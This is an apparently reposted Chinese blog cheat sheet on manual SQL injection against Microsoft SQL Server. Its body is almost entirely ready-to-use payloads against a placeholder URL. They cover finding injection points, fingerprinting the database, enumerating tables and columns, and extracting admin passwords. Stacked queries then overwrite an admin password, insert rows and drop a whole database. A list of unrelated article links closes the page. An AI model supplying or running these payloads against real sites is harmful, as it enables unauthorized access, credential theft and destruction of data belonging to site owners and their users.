博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
mssql手工注入
阅读量:6117 次
发布时间:2019-06-21

本文共 1388 字,大约阅读时间需要 4 分钟。

判断注入点:

 

1、数字型

 

http://www.targer.com/article.aspx?id=1

http://www.targer.com/article.aspx?id=1'

http://www.targer.com/article.aspx?id=1 and 1=1

http://www.targer.com/article.aspx?id=1 and 1=2

 

2、字符型

 

http://www.targer.com/article.aspx?action=value' and 1=1

http://www.targer.com/article.aspx?action=value' and 1=2

 

3、搜索型

 

searchpoints%' and 1=1

searchpoints%' and 1=2

 

确定数据库类型:

 

http://www.targer.com/article.aspx?id=1 and user>0

http://www.targer.com/article.aspx?id=1 and (select count(*) from sysobjects)>0

 

查询当前用户数据信息:

 

article.aspx?id=1 having 1=1--

 

暴当前表中的列:

 

article.aspx?id=1 group by admin.username having 1=1--

article.aspx?id=1 group by admin.username,admin.password having 1=1--

 

暴任意表和列:

 

and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1

and (select top col_name(object_id('admin'),N) from sysobjects)>1

 

暴数据库数据:

 

and (select top 1 password from admin where id=N)>1

 

修改数据库中的数据:

 

;update admin set password='oooooo' where username='xxx'

 

增添数据库中的数据:

 

;insert into admin values (xxx,oooooo)--

 

删除数据库:

 

;drop database webdata

 

常用SQL总结:

 

获取当前数据库用户名:and user>0

 

获取当前数据库名:and db_name()>0

 

获取数据库版本:and (select @@version)>0

 

判断是否支持多句查询:;declare @a int--

 

判断是否支持子查询:and (select count(1) from [sysobjects])>=0

 

原文地址:http://wenku.baidu.com/link?url=HUz29K2oQStQY5xhqX84mI622D0tjsiuBN-seONO9YYf0OM12KlEs3Sw5pxwu1Iw2INeWJ-njqNKCWM2d7rMZ1cATTWiyBep5WO0bC2EFjW

转载地址:http://eepka.baihongyu.com/

你可能感兴趣的文章
linux系统安装的引导镜像制作流程分享
查看>>
解决ros建***能登录不能访问内网远程桌面的问题
查看>>
pfsense锁住自己
查看>>
vsftpd 相关总结
查看>>
bash complete -C command
查看>>
解决zabbix 3.0中1151端口不能运行问题
查看>>
售前工程师的成长---一个老员工的经验之谈
查看>>
Get到的优秀博客网址
查看>>
dubbo
查看>>
【Git入门之四】操作项目
查看>>
老男孩教育每日一题-第107天-简述你对***的理解,常见的有哪几种?
查看>>
Python学习--time
查看>>
在OSCHINA上的第一篇博文,以后好好学习吧
查看>>
高利率时代的结局,任重道远,前途叵测
查看>>
Debian 6.05安装后乱码
查看>>
欢迎大家观看本人录制的51CTO精彩视频课程!
查看>>
IntelliJ IDEA中设置忽略@param注释中的参数与方法中的参数列表不一致的检查
查看>>
关于软件开发的一些感悟
查看>>
uva 10806
查看>>
纯CSS3绘制的黑色图标按钮组合
查看>>